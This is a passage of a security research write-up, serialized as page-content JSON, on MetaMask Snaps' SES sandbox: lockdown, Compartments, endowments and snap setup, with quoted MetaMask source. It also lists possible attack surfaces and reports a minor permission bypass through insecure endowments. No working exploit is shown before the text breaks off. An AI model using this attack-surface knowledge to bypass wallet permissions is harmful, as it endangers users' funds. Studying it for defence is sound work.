Let's dig into how it works:",{"type":27,"tag":26163,"props":44590,"children":44592},{"id":44591},"ses-fundamentals",[44593],{"type":33,"value":44594},"SES Fundamentals",{"type":27,"tag":44596,"props":44597,"children":44598},"h5",{"id":44566},[44599],{"type":33,"value":44600},"Lockdown",{"type":27,"tag":36,"props":44602,"children":44603},{},[44604,44606,44612],{"type":33,"value":44605},"As the first step of setting up the SES sandbox, Metamask executes the ",{"type":27,"tag":84,"props":44607,"children":44609},{"className":44608},[],[44610],{"type":33,"value":44611},"lockdown()",{"type":33,"value":44613}," function, which protects javascript objects against some attacks, mainly:",{"type":27,"tag":12719,"props":44615,"children":44616},{},[44617,44630],{"type":27,"tag":1232,"props":44618,"children":44619},{},[44620,44622,44628],{"type":33,"value":44621},"Prototype Pollution\nLockdown executes ",{"type":27,"tag":84,"props":44623,"children":44625},{"className":44624},[],[44626],{"type":33,"value":44627},"Object.freeze",{"type":33,"value":44629}," against all javascript builtins prototypes, preventing these attacks.",{"type":27,"tag":1232,"props":44631,"children":44632},{},[44633,44635,44641,44643,44649],{"type":33,"value":44634},"Information disclosure\nLockdown removes some sensitive information that can be disclosed by some javascript builtin objects, such as the ",{"type":27,"tag":84,"props":44636,"children":44638},{"className":44637},[],[44639],{"type":33,"value":44640},"trace",{"type":33,"value":44642}," attribute in an ",{"type":27,"tag":84,"props":44644,"children":44646},{"className":44645},[],[44647],{"type":33,"value":44648},"Error",{"type":33,"value":44650}," object, which contains the stack trace of the error.",{"type":27,"tag":44596,"props":44652,"children":44654},{"id":44653},"compartment",[44655],{"type":33,"value":44656},"Compartment",{"type":27,"tag":36,"props":44658,"children":44659},{},[44660,44662,44668,44670,44675],{"type":33,"value":44661},"Compartments serve as the fundamental security layer within the snap execution environment. Their primary function is to establish a tightly controlled sandboxed execution environment. This is accomplished by manipulating the ",{"type":27,"tag":84,"props":44663,"children":44665},{"className":44664},[],[44666],{"type":33,"value":44667},"globalThis",{"type":33,"value":44669}," object to exclusively accommodate secure functions. Consequently, any code executed within this controlled ",{"type":27,"tag":84,"props":44671,"children":44673},{"className":44672},[],[44674],{"type":33,"value":44667},{"type":33,"value":44676}," context is incapable of tampering with security.",{"type":27,"tag":101,"props":44678,"children":44680},{"className":1571,"code":44679,"language":1570,"meta":7,"style":7},"const c = new Compartment();\nc.globalThis === globalThis; // false\nc.globalThis.JSON === JSON; // true\n",[44681],{"type":27,"tag":84,"props":44682,"children":44683},{"__ignoreMap":7},[44684,44712,44745],{"type":27,"tag":207,"props":44685,"children":44686},{"class":209,"line":210},[44687,44691,44695,44699,44703,44708],{"type":27,"tag":207,"props":44688,"children":44689},{"style":214},[44690],{"type":33,"value":16931},{"type":27,"tag":207,"props":44692,"children":44693},{"style":220},[44694],{"type":33,"value":280},{"type":27,"tag":207,"props":44696,"children":44697},{"style":226},[44698],{"type":33,"value":229},{"type":27,"tag":207,"props":44700,"children":44701},{"style":214},[44702],{"type":33,"value":1597},{"type":27,"tag":207,"props":44704,"children":44705},{"style":1335},[44706],{"type":33,"value":44707}," Compartment",{"type":27,"tag":207,"props":44709,"children":44710},{"style":238},[44711],{"type":33,"value":4301},{"type":27,"tag":207,"props":44713,"children":44714},{"class":209,"line":244},[44715,44719,44723,44727,44731,44736,44740],{"type":27,"tag":207,"props":44716,"children":44717},{"style":220},[44718],{"type":33,"value":10435},{"type":27,"tag":207,"props":44720,"children":44721},{"style":238},[44722],{"type":33,"value":1041},{"type":27,"tag":207,"props":44724,"children":44725},{"style":220},[44726],{"type":33,"value":44667},{"type":27,"tag":207,"props":44728,"children":44729},{"style":226},[44730],{"type":33,"value":38682},{"type":27,"tag":207,"props":44732,"children":44733},{"style":220},[44734],{"type":33,"value":44735}," globalThis",{"type":27,"tag":207,"props":44737,"children":44738},{"style":238},[44739],{"type":33,"value":4685},{"type":27,"tag":207,"props":44741,"children":44742},{"style":4647},[44743],{"type":33,"value":44744},"// false\n",{"type":27,"tag":207,"props":44746,"children":44747},{"class":209,"line":270},[44748,44752,44756,44760,44764,44769,44773,44778,44782],{"type":27,"tag":207,"props":44749,"children":44750},{"style":220},[44751],{"type":33,"value":10435},{"type":27,"tag":207,"props":44753,"children":44754},{"style":238},[44755],{"type":33,"value":1041},{"type":27,"tag":207,"props":44757,"children":44758},{"style":220},[44759],{"type":33,"value":44667},{"type":27,"tag":207,"props":44761,"children":44762},{"style":238},[44763],{"type":33,"value":1041},{"type":27,"tag":207,"props":44765,"children":44766},{"style":220},[44767],{"type":33,"value":44768},"JSON",{"type":27,"tag":207,"props":44770,"children":44771},{"style":226},[44772],{"type":33,"value":38682},{"type":27,"tag":207,"props":44774,"children":44775},{"style":220},[44776],{"type":33,"value":44777}," JSON",{"type":27,"tag":207,"props":44779,"children":44780},{"style":238},[44781],{"type":33,"value":4685},{"type":27,"tag":207,"props":44783,"children":44784},{"style":4647},[44785],{"type":33,"value":44786},"// true\n",{"type":27,"tag":36,"props":44788,"children":44789},{},[44790,44792,44797,44799,44805,44807,44812],{"type":33,"value":44791},"Compartment also changes the behaviour of evaluators functions such as ",{"type":27,"tag":84,"props":44793,"children":44795},{"className":44794},[],[44796],{"type":33,"value":8871},{"type":33,"value":44798}," and the ",{"type":27,"tag":84,"props":44800,"children":44802},{"className":44801},[],[44803],{"type":33,"value":44804},"Function",{"type":33,"value":44806}," constructor, so that the evaluated code is also executed within the sandboxed ",{"type":27,"tag":84,"props":44808,"children":44810},{"className":44809},[],[44811],{"type":33,"value":44667},{"type":33,"value":1041},{"type":27,"tag":44596,"props":44814,"children":44816},{"id":44815},"endowments",[44817],{"type":33,"value":44818},"Endowments",{"type":27,"tag":36,"props":44820,"children":44821},{},[44822,44824,44828,44830,44835],{"type":33,"value":44823},"While creating a Compartment, it is possible to specify ",{"type":27,"tag":942,"props":44825,"children":44826},{},[44827],{"type":33,"value":44815},{"type":33,"value":44829},". These endowments constitute objects that become accessible within the Compartment's ",{"type":27,"tag":84,"props":44831,"children":44833},{"className":44832},[],[44834],{"type":33,"value":44667},{"type":33,"value":44836},". However, endowments need to be carefully chosen and sanitized since they will be exposed to the untrusted environment.",{"type":27,"tag":36,"props":44838,"children":44839},{},[44840,44842,44848],{"type":33,"value":44841},"In addition, SES provides the ",{"type":27,"tag":84,"props":44843,"children":44845},{"className":44844},[],[44846],{"type":33,"value":44847},"harden()",{"type":33,"value":44849}," function, which is mainly used to prevent the endowments to be modified by a malicious code executed in a Compartment.",{"type":27,"tag":26163,"props":44851,"children":44853},{"id":44852},"setting-up-snaps-execution-env",[44854],{"type":33,"value":44855},"Setting up Snaps Execution Env",{"type":27,"tag":36,"props":44857,"children":44858},{},[44859],{"type":33,"value":44860},"When starting a snap, the setup follows these steps:",{"type":27,"tag":12719,"props":44862,"children":44863},{},[44864],{"type":27,"tag":1232,"props":44865,"children":44866},{},[44867],{"type":27,"tag":12606,"props":44868,"children":44869},{},[44870,44872],{"type":33,"value":44871},"Create endowments based on snap ",{"type":27,"tag":47,"props":44873,"children":44876},{"href":44874,"rel":44875},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L327",[51],[44877],{"type":33,"value":44878},"permissions",{"type":27,"tag":101,"props":44880,"children":44882},{"className":1571,"code":44881,"language":1570,"meta":7,"style":7},"const { endowments, teardown: endowmentTeardown } = createEndowments(\n snap,\n ethereum,\n snapId,\n _endowments,\n);\n",[44883],{"type":27,"tag":84,"props":44884,"children":44885},{"__ignoreMap":7},[44886,44936,44948,44959,44971,44983],{"type":27,"tag":207,"props":44887,"children":44888},{"class":209,"line":210},[44889,44893,44897,44901,44905,44910,44914,44919,44923,44927,44932],{"type":27,"tag":207,"props":44890,"children":44891},{"style":214},[44892],{"type":33,"value":16931},{"type":27,"tag":207,"props":44894,"children":44895},{"style":238},[44896],{"type":33,"value":16862},{"type":27,"tag":207,"props":44898,"children":44899},{"style":220},[44900],{"type":33,"value":44815},{"type":27,"tag":207,"props":44902,"children":44903},{"style":238},[44904],{"type":33,"value":1123},{"type":27,"tag":207,"props":44906,"children":44907},{"style":220},[44908],{"type":33,"value":44909},"teardown",{"type":27,"tag":207,"props":44911,"children":44912},{"style":238},[44913],{"type":33,"value":22606},{"type":27,"tag":207,"props":44915,"children":44916},{"style":220},[44917],{"type":33,"value":44918},"endowmentTeardown",{"type":27,"tag":207,"props":44920,"children":44921},{"style":238},[44922],{"type":33,"value":43452},{"type":27,"tag":207,"props":44924,"children":44925},{"style":226},[44926],{"type":33,"value":10380},{"type":27,"tag":207,"props":44928,"children":44929},{"style":1335},[44930],{"type":33,"value":44931}," createEndowments",{"type":27,"tag":207,"props":44933,"children":44934},{"style":238},[44935],{"type":33,"value":9090},{"type":27,"tag":207,"props":44937,"children":44938},{"class":209,"line":244},[44939,44944],{"type":27,"tag":207,"props":44940,"children":44941},{"style":220},[44942],{"type":33,"value":44943}," snap",{"type":27,"tag":207,"props":44945,"children":44946},{"style":238},[44947],{"type":33,"value":1842},{"type":27,"tag":207,"props":44949,"children":44950},{"class":209,"line":270},[44951,44955],{"type":27,"tag":207,"props":44952,"children":44953},{"style":220},[44954],{"type":33,"value":38744},{"type":27,"tag":207,"props":44956,"children":44957},{"style":238},[44958],{"type":33,"value":1842},{"type":27,"tag":207,"props":44960,"children":44961},{"class":209,"line":296},[44962,44967],{"type":27,"tag":207,"props":44963,"children":44964},{"style":220},[44965],{"type":33,"value":44966}," snapId",{"type":27,"tag":207,"props":44968,"children":44969},{"style":238},[44970],{"type":33,"value":1842},{"type":27,"tag":207,"props":44972,"children":44973},{"class":209,"line":445},[44974,44979],{"type":27,"tag":207,"props":44975,"children":44976},{"style":220},[44977],{"type":33,"value":44978}," _endowments",{"type":27,"tag":207,"props":44980,"children":44981},{"style":238},[44982],{"type":33,"value":1842},{"type":27,"tag":207,"props":44984,"children":44985},{"class":209,"line":867},[44986],{"type":27,"tag":207,"props":44987,"children":44988},{"style":238},[44989],{"type":33,"value":1455},{"type":27,"tag":36,"props":44991,"children":44992},{},[44993],{"type":33,"value":44994},"In the snap development, the required permissions need to be specified in a snap manifest file. Some of these permissions expose extra functions as endowments in the Compartment.",{"type":27,"tag":36,"props":44996,"children":44997},{},[44998,45000,45006,45008,45014],{"type":33,"value":44999},"One clear example is the ",{"type":27,"tag":84,"props":45001,"children":45003},{"className":45002},[],[45004],{"type":33,"value":45005},"endowment:network-access",{"type":33,"value":45007}," permission, that adds the ",{"type":27,"tag":84,"props":45009,"children":45011},{"className":45010},[],[45012],{"type":33,"value":45013},"fetch()",{"type":33,"value":45015}," function to the endowments.",{"type":27,"tag":36,"props":45017,"children":45018},{},[45019,45021,45027],{"type":33,"value":45020},"All endowments are protected with the ",{"type":27,"tag":84,"props":45022,"children":45024},{"className":45023},[],[45025],{"type":33,"value":45026},"harden",{"type":33,"value":45028}," function to prevent possible exploits derived from the endowment modification, with two exceptions.",{"type":27,"tag":12719,"props":45030,"children":45031},{"start":244},[45032],{"type":27,"tag":1232,"props":45033,"children":45034},{},[45035],{"type":27,"tag":12606,"props":45036,"children":45037},{},[45038,45040],{"type":33,"value":45039},"Create the snap ",{"type":27,"tag":47,"props":45041,"children":45044},{"href":45042,"rel":45043},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L345",[51],[45045],{"type":33,"value":44653},{"type":27,"tag":101,"props":45047,"children":45049},{"className":1571,"code":45048,"language":1570,"meta":7,"style":7},"const compartment = new Compartment({\n ...endowments,\n module: snapModule,\n exports: snapModule.exports,\n});\n",[45050],{"type":27,"tag":84,"props":45051,"children":45052},{"__ignoreMap":7},[45053,45081,45097,45114,45138],{"type":27,"tag":207,"props":45054,"children":45055},{"class":209,"line":210},[45056,45060,45065,45069,45073,45077],{"type":27,"tag":207,"props":45057,"children":45058},{"style":214},[45059],{"type":33,"value":16931},{"type":27,"tag":207,"props":45061,"children":45062},{"style":220},[45063],{"type":33,"value":45064}," compartment",{"type":27,"tag":207,"props":45066,"children":45067},{"style":226},[45068],{"type":33,"value":229},{"type":27,"tag":207,"props":45070,"children":45071},{"style":214},[45072],{"type":33,"value":1597},{"type":27,"tag":207,"props":45074,"children":45075},{"style":1335},[45076],{"type":33,"value":44707},{"type":27,"tag":207,"props":45078,"children":45079},{"style":238},[45080],{"type":33,"value":22415},{"type":27,"tag":207,"props":45082,"children":45083},{"class":209,"line":244},[45084,45089,45093],{"type":27,"tag":207,"props":45085,"children":45086},{"style":226},[45087],{"type":33,"value":45088}," ...",{"type":27,"tag":207,"props":45090,"children":45091},{"style":220},[45092],{"type":33,"value":44815},{"type":27,"tag":207,"props":45094,"children":45095},{"style":238},[45096],{"type":33,"value":1842},{"type":27,"tag":207,"props":45098,"children":45099},{"class":209,"line":270},[45100,45105,45110],{"type":27,"tag":207,"props":45101,"children":45102},{"style":220},[45103],{"type":33,"value":45104}," module:",{"type":27,"tag":207,"props":45106,"children":45107},{"style":220},[45108],{"type":33,"value":45109}," snapModule",{"type":27,"tag":207,"props":45111,"children":45112},{"style":238},[45113],{"type":33,"value":1842},{"type":27,"tag":207,"props":45115,"children":45116},{"class":209,"line":296},[45117,45122,45126,45130,45134],{"type":27,"tag":207,"props":45118,"children":45119},{"style":220},[45120],{"type":33,"value":45121}," exports:",{"type":27,"tag":207,"props":45123,"children":45124},{"style":220},[45125],{"type":33,"value":45109},{"type":27,"tag":207,"props":45127,"children":45128},{"style":238},[45129],{"type":33,"value":1041},{"type":27,"tag":207,"props":45131,"children":45132},{"style":220},[45133],{"type":33,"value":2041},{"type":27,"tag":207,"props":45135,"children":45136},{"style":238},[45137],{"type":33,"value":1842},{"type":27,"tag":207,"props":45139,"children":45140},{"class":209,"line":445},[45141],{"type":27,"tag":207,"props":45142,"children":45143},{"style":238},[45144],{"type":33,"value":42591},{"type":27,"tag":36,"props":45146,"children":45147},{},[45148,45150,45156,45157,45162,45164,45169],{"type":33,"value":45149},"Note: ",{"type":27,"tag":84,"props":45151,"children":45153},{"className":45152},[],[45154],{"type":33,"value":45155},"module",{"type":33,"value":1131},{"type":27,"tag":84,"props":45158,"children":45160},{"className":45159},[],[45161],{"type":33,"value":2041},{"type":33,"value":45163}," are passed as endowments, but without being ",{"type":27,"tag":942,"props":45165,"children":45166},{},[45167],{"type":33,"value":45168},"hardened",{"type":33,"value":45170},". This is intentional, as the snap needs to export functions to be correctly executed.",{"type":27,"tag":12719,"props":45172,"children":45173},{"start":270},[45174],{"type":27,"tag":1232,"props":45175,"children":45176},{},[45177],{"type":27,"tag":12606,"props":45178,"children":45179},{},[45180,45182],{"type":33,"value":45181},"Evaluate the snap code inside the ",{"type":27,"tag":47,"props":45183,"children":45186},{"href":45184,"rel":45185},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L359",[51],[45187],{"type":33,"value":44653},{"type":27,"tag":101,"props":45189,"children":45191},{"className":1571,"code":45190,"language":1570,"meta":7,"style":7},"await this.executeInSnapContext(snapId, () => {\n compartment.evaluate(sourceCode);\n this.registerSnapExports(snapId, snapModule);\n});\n",[45192],{"type":27,"tag":84,"props":45193,"children":45194},{"__ignoreMap":7},[45195,45236,45266,45303],{"type":27,"tag":207,"props":45196,"children":45197},{"class":209,"line":210},[45198,45202,45206,45210,45215,45219,45223,45228,45232],{"type":27,"tag":207,"props":45199,"children":45200},{"style":376},[45201],{"type":33,"value":4173},{"type":27,"tag":207,"props":45203,"children":45204},{"style":214},[45205],{"type":33,"value":42968},{"type":27,"tag":207,"props":45207,"children":45208},{"style":238},[45209],{"type":33,"value":1041},{"type":27,"tag":207,"props":45211,"children":45212},{"style":1335},[45213],{"type":33,"value":45214},"executeInSnapContext",{"type":27,"tag":207,"props":45216,"children":45217},{"style":238},[45218],{"type":33,"value":1343},{"type":27,"tag":207,"props":45220,"children":45221},{"style":220},[45222],{"type":33,"value":43272},{"type":27,"tag":207,"props":45224,"children":45225},{"style":238},[45226],{"type":33,"value":45227},", () ",{"type":27,"tag":207,"props":45229,"children":45230},{"style":214},[45231],{"type":33,"value":2321},{"type":27,"tag":207,"props":45233,"children":45234},{"style":238},[45235],{"type":33,"value":384},{"type":27,"tag":207,"props":45237,"children":45238},{"class":209,"line":244},[45239,45244,45248,45253,45257,45262],{"type":27,"tag":207,"props":45240,"children":45241},{"style":220},[45242],{"type":33,"value":45243}," compartment",{"type":27,"tag":207,"props":45245,"children":45246},{"style":238},[45247],{"type":33,"value":1041},{"type":27,"tag":207,"props":45249,"children":45250},{"style":1335},[45251],{"type":33,"value":45252},"evaluate",{"type":27,"tag":207,"props":45254,"children":45255},{"style":238},[45256],{"type":33,"value":1343},{"type":27,"tag":207,"props":45258,"children":45259},{"style":220},[45260],{"type":33,"value":45261},"sourceCode",{"type":27,"tag":207,"props":45263,"children":45264},{"style":238},[45265],{"type":33,"value":1455},{"type":27,"tag":207,"props":45267,"children":45268},{"class":209,"line":270},[45269,45273,45277,45282,45286,45290,45294,45299],{"type":27,"tag":207,"props":45270,"children":45271},{"style":214},[45272],{"type":33,"value":43316},{"type":27,"tag":207,"props":45274,"children":45275},{"style":238},[45276],{"type":33,"value":1041},{"type":27,"tag":207,"props":45278,"children":45279},{"style":1335},[45280],{"type":33,"value":45281},"registerSnapExports",{"type":27,"tag":207,"props":45283,"children":45284},{"style":238},[45285],{"type":33,"value":1343},{"type":27,"tag":207,"props":45287,"children":45288},{"style":220},[45289],{"type":33,"value":43272},{"type":27,"tag":207,"props":45291,"children":45292},{"style":238},[45293],{"type":33,"value":1123},{"type":27,"tag":207,"props":45295,"children":45296},{"style":220},[45297],{"type":33,"value":45298},"snapModule",{"type":27,"tag":207,"props":45300,"children":45301},{"style":238},[45302],{"type":33,"value":1455},{"type":27,"tag":207,"props":45304,"children":45305},{"class":209,"line":296},[45306],{"type":27,"tag":207,"props":45307,"children":45308},{"style":238},[45309],{"type":33,"value":42591},{"type":27,"tag":36,"props":45311,"children":45312},{},[45313,45315,45321,45322,45328,45329,45335],{"type":33,"value":45314},"According to the documentation, the snap must contain one of the following function exports: ",{"type":27,"tag":84,"props":45316,"children":45318},{"className":45317},[],[45319],{"type":33,"value":45320},"onRpcRequest",{"type":33,"value":1123},{"type":27,"tag":84,"props":45323,"children":45325},{"className":45324},[],[45326],{"type":33,"value":45327},"onTransaction",{"type":33,"value":20411},{"type":27,"tag":84,"props":45330,"children":45332},{"className":45331},[],[45333],{"type":33,"value":45334},"onCronjob",{"type":33,"value":1041},{"type":27,"tag":36,"props":45337,"children":45338},{},[45339,45341,45346],{"type":33,"value":45340},"Once the Compartment creates these functions, no matter where they are executed, they will always be evaluated within the sandboxed ",{"type":27,"tag":84,"props":45342,"children":45344},{"className":45343},[],[45345],{"type":33,"value":44667},{"type":33,"value":45347}," environment of that Compartment.",{"type":27,"tag":36,"props":45349,"children":45350},{},[45351],{"type":33,"value":45352},"After the evaluation, the function exports are registered and executed later when the respective event is emmited.",{"type":27,"tag":28,"props":45354,"children":45356},{"id":45355},"vulnerability-research",[45357],{"type":33,"value":45358},"Vulnerability research",{"type":27,"tag":58,"props":45360,"children":45362},{"id":45361},"possible-attacks",[45363],{"type":33,"value":45364},"Possible attacks",{"type":27,"tag":36,"props":45366,"children":45367},{},[45368],{"type":33,"value":45369},"While searching for vulnerabilities in snap environments, we enumerated some features that can be broken, and lead to security issues, such as:",{"type":27,"tag":1228,"props":45371,"children":45372},{},[45373,45378,45383,45388],{"type":27,"tag":1232,"props":45374,"children":45375},{},[45376],{"type":33,"value":45377},"Broken SES Container isolation",{"type":27,"tag":1232,"props":45379,"children":45380},{},[45381],{"type":33,"value":45382},"Insecure endowments in Containers",{"type":27,"tag":1232,"props":45384,"children":45385},{},[45386],{"type":33,"value":45387},"Incorrect RPC permission checks",{"type":27,"tag":1232,"props":45389,"children":45390},{},[45391],{"type":33,"value":45392},"Insecure snap installation/update",{"type":27,"tag":36,"props":45394,"children":45395},{},[45396],{"type":33,"value":45397},"We went through all of these vulnerabilities assumptions, and found a minor permission bypass bug using insecure endowments.",{"type":27,"tag":36,"props":45399,"children":45400},{},[45401],{"type":33,"value":45402},"To understand the exploit, we need to dig into the snap's RPC interfaces exposed via endowments.",{"type":27,"tag":58,"props":45404,"children":45406},{"id":45405},"rpc-interfaces-endowments",[45407],{"type":33,"value":45408},"RPC interfaces endowments",{"type":27,"tag":26163,"props":45410,"children":45412},{"id":45411},"providers-limitations",[45413],{"type":33,"value":45414},"Providers limitations",{"type":27,"tag":36,"props":45416,"children":45417},{},[45418,45420,45426,45427,45432,45434,45441],{"type":33,"value":45419},"A snap has two interfaces that can be used to communicate with metamask RPC interface: ",{"type":27,"tag":84,"props":45421,"children":45423},{"className":45422},[],[45424],{"type":33,"value":45425},"snap",{"type":33,"value":1131},{"type":27,"tag":84,"props":45428,"children":45430},{"className":45429},[],[45431],{"type":33,"value":38677},{"type":33,"value":45433}," (EIP-1193). These differ in that each one can only send a subset of the available RPC ",{"type":27,"tag":47,"props":45435,"children":45438},{"href":45436,"rel":45437},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/utils.ts#L130",[51],[45439],{"type":33,"value":45440},"methods",{"type":33,"value":736},{"type":27,"tag":101,"props":45443,"children":45445},{"className":1571,"code":45444,"language":1570,"meta":7,"style":7},"export function assertSnapOutboundRequest(args: RequestArguments) {\n // Disallow any non `wallet_` or `snap_` methods for separation of concerns.\n assert(\n String.prototype.startsWith.call(args.method, 'wallet_') ||\n String.prototype.startsWith.call(args.method, 'snap_'),\n 'The global Snap API only allows RPC methods starting with `wallet_*` and `snap_*`.',\n );\n assert(\n !BLOCKED_RPC_METHODS.includes(args.method),\n ethErrors.rpc.methodNotFound({\n data: {\n method: args.method,\n },\n }),\n );\n assertStruct(args, JsonStruct, 'Provided value is not JSON-RPC compatible');\n}\n",[45446],{"type":27,"tag":84,"props":45447,"children":45448},{"__ignoreMap":7},[45449,45488,45496,45508,45578,45639,45651,45659,45670,45710,45740,45752,45777,45784,45792,45799,45837],{"type":27,"tag":207,"props":45450,"children":45451},{"class":209,"line":210},[45452,45457,45462,45467,45471,45475,45479,45484],{"type":27,"tag":207,"props":45453,"children":45454},{"style":376},[45455],{"type":33,"value":45456},"export",{"type":27,"tag":207,"props":45458,"children":45459},{"style":214},[45460],{"type":33,"value":45461}," function",{"type":27,"tag":207,"props":45463,"children":45464},{"style":1335},[45465],{"type":33,"value":45466}," assertSnapOutboundRequest",{"type":27,"tag":207,"props":45468,"children":45469},{"style":238},[45470],{"type":33,"value":1343},{"type":27,"tag":207,"props":45472,"children":45473},{"style":220},[45474],{"type":33,"value":1105},{"type":27,"tag":207,"props":45476,"children":45477},{"style":226},[45478],{"type":33,"value":736},{"type":27,"tag":207,"props":45480,"children":45481},{"style":8920},[45482],{"type":33,"value":45483}," RequestArguments",{"type":27,"tag":207,"props":45485,"children":45486},{"style":238},[45487],{"type":33,"value":1424},{"type":27,"tag":207,"props":45489,"children":45490},{"class":209,"line":244},[45491],{"type":27,"tag":207,"props":45492,"children":45493},{"style":4647},[45494],{"type":33,"value":45495}," // Disallow any non `wallet_` or `snap_` methods for separation of concerns.\n",{"type":27,"tag":207,"props":45497,"children":45498},{"class":209,"line":270},[45499,45504],{"type":27,"tag":207,"props":45500,"children":45501},{"style":1335},[45502],{"type":33,"value":45503}," assert",{"type":27,"tag":207,"props":45505,"children":45506},{"style":238},[45507],{"type":33,"value":9090},{"type":27,"tag":207,"props":45509,"children":45510},{"class":209,"line":296},[45511,45516,45520,45525,45529,45534,45538,45543,45547,45551,45555,45560,45564,45569,45573],{"type":27,"tag":207,"props":45512,"children":45513},{"style":8920},[45514],{"type":33,"value":45515}," String",{"type":27,"tag":207,"props":45517,"children":45518},{"style":238},[45519],{"type":33,"value":1041},{"type":27,"tag":207,"props":45521,"children":45522},{"style":220},[45523],{"type":33,"value":45524},"prototype",{"type":27,"tag":207,"props":45526,"children":45527},{"style":238},[45528],{"type":33,"value":1041},{"type":27,"tag":207,"props":45530,"children":45531},{"style":220},[45532],{"type":33,"value":45533},"startsWith",{"type":27,"tag":207,"props":45535,"children":45536},{"style":238},[45537],{"type":33,"value":1041},{"type":27,"tag":207,"props":45539,"children":45540},{"style":1335},[45541],{"type":33,"value":45542},"call",{"type":27,"tag":207,"props":45544,"children":45545},{"style":238},[45546],{"type":33,"value":1343},{"type":27,"tag":207,"props":45548,"children":45549},{"style":220},[45550],{"type":33,"value":1105},{"type":27,"tag":207,"props":45552,"children":45553},{"style":238},[45554],{"type":33,"value":1041},{"type":27,"tag":207,"props":45556,"children":45557},{"style":220},[45558],{"type":33,"value":45559},"method",{"type":27,"tag":207,"props":45561,"children":45562},{"style":238},[45563],{"type":33,"value":1123},{"type":27,"tag":207,"props":45565,"children":45566},{"style":1325},[45567],{"type":33,"value":45568},"'wallet_'",{"type":27,"tag":207,"props":45570,"children":45571},{"style":238},[45572],{"type":33,"value":2222},{"type":27,"tag":207,"props":45574,"children":45575},{"style":226},[45576],{"type":33,"value":45577},"||\n",{"type":27,"tag":207,"props":45579,"children":45580},{"class":209,"line":445},[45581,45586,45590,45594,45598,45602,45606,45610,45614,45618,45622,45626,45630,45635],{"type":27,"tag":207,"props":45582,"children":45583},{"style":8920},[45584],{"type":33,"value":45585}," String",{"type":27,"tag":207,"props":45587,"children":45588},{"style":238},[45589],{"type":33,"value":1041},{"type":27,"tag":207,"props":45591,"children":45592},{"style":220},[45593],{"type":33,"value":45524},{"type":27,"tag":207,"props":45595,"children":45596},{"style":238},[45597],{"type":33,"value":1041},{"type":27,"tag":207,"props":45599,"children":45600},{"style":220},[45601],{"type":33,"value":45533},{"type":27,"tag":207,"props":45603,"children":45604},{"style":238},[45605],{"type":33,"value":1041},{"type":27,"tag":207,"props":45607,"children":45608},{"style":1335},[45609],{"type":33,"value":45542},{"type":27,"tag":207,"props":45611,"children":45612},{"style":238},[45613],{"type":33,"value":1343},{"type":27,"tag":207,"props":45615,"children":45616},{"style":220},[45617],{"type":33,"value":1105},{"type":27,"tag":207,"props":45619,"children":45620},{"style":238},[45621],{"type":33,"value":1041},{"type":27,"tag":207,"props":45623,"children":45624},{"style":220},[45625],{"type":33,"value":45559},{"type":27,"tag":207,"props":45627,"children":45628},{"style":238},[45629],{"type":33,"value":1123},{"type":27,"tag":207,"props":45631,"children":45632},{"style":1325},[45633],{"type":33,"value":45634},"'snap_'",{"type":27,"tag":207,"props":45636,"children":45637},{"style":238},[45638],{"type":33,"value":14018},{"type":27,"tag":207,"props":45640,"children":45641},{"class":209,"line":867},[45642,45647],{"type":27,"tag":207,"props":45643,"children":45644},{"style":1325},[45645],{"type":33,"value":45646}," 'The global Snap API only allows RPC methods starting with `wallet_*` and `snap_*`.'",{"type":27,"tag":207,"props":45648,"children":45649},{"style":238},[45650],{"type":33,"value":1842},{"type":27,"tag":207,"props":45652,"children":45653},{"class":209,"line":892},[45654],{"type":27,"tag":207,"props":45655,"children":45656},{"style":238},[45657],{"type":33,"value":45658}," );\n",{"type":27,"tag":207,"props":45660,"children":45661},{"class":209,"line":1475},[45662,45666],{"type":27,"tag":207,"props":45663,"children":45664},{"style":1335},[45665],{"type":33,"value":45503},{"type":27,"tag":207,"props":45667,"children":45668},{"style":238},[45669],{"type":33,"value":9090},{"type":27,"tag":207,"props":45671,"children":45672},{"class":209,"line":2065},[45673,45677,45682,45686,45690,45694,45698,45702,45706],{"type":27,"tag":207,"props":45674,"children":45675},{"style":226},[45676],{"type":33,"value":28242},{"type":27,"tag":207,"props":45678,"children":45679},{"style":220},[45680],{"type":33,"value":45681},"BLOCKED_RPC_METHODS",{"type":27,"tag":207,"props":45683,"children":45684},{"style":238},[45685],{"type":33,"value":1041},{"type":27,"tag":207,"props":45687,"children":45688},{"style":1335},[45689],{"type":33,"value":42436},{"type":27,"tag":207,"props":45691,"children":45692},{"style":238},[45693],{"type":33,"value":1343},{"type":27,"tag":207,"props":45695,"children":45696},{"style":220},[45697],{"type":33,"value":1105},{"type":27,"tag":207,"props":45699,"children":45700},{"style":238},[45701],{"type":33,"value":1041},{"type":27,"tag":207,"props":45703,"children":45704},{"style":220},[45705],{"type":33,"value":45559},{"type":27,"tag":207,"props":45707,"children":45708},{"style":238},[45709],{"type":33,"value":14018},{"type":27,"tag":207,"props":45711,"children":45712},{"class":209,"line":2092},[45713,45718,45722,45727,45731,45736],{"type":27,"tag":207,"props":45714,"children":45715},{"style":220},[45716],{"type":33,"value":45717}," ethErrors",{"type":27,"tag":207,"props":45719,"children":45720},{"style":238},[45721],{"type":33,"value":1041},{"type":27,"tag":207,"props":45723,"children":45724},{"style":220},[45725],{"type":33,"value":45726},"rpc",{"type":27,"tag":207,"props":45728,"children":45729},{"style":238},[45730],{"type":33,"value":1041},{"type":27,"tag":207,"props":45732,"children":45733},{"style":1335},[45734],{"type":33,"value":45735},"methodNotFound",{"type":27,"tag":207,"props":45737,"children":45738},{"style":238},[45739],{"type":33,"value":22415},{"type":27,"tag":207,"props":45741,"children":45742},{"class":209,"line":2130},[45743,45748],{"type":27,"tag":207,"props":45744,"children":45745},{"style":220},[45746],{"type":33,"value":45747}," data:",{"type":27,"tag":207,"props":45749,"children":45750},{"style":238},[45751],{"type":33,"value":384},{"type":27,"tag":207,"props":45753,"children":45754},{"class":209,"line":2168},[45755,45760,45765,45769,45773],{"type":27,"tag":207,"props":45756,"children":45757},{"style":220},[45758],{"type":33,"value":45759}," 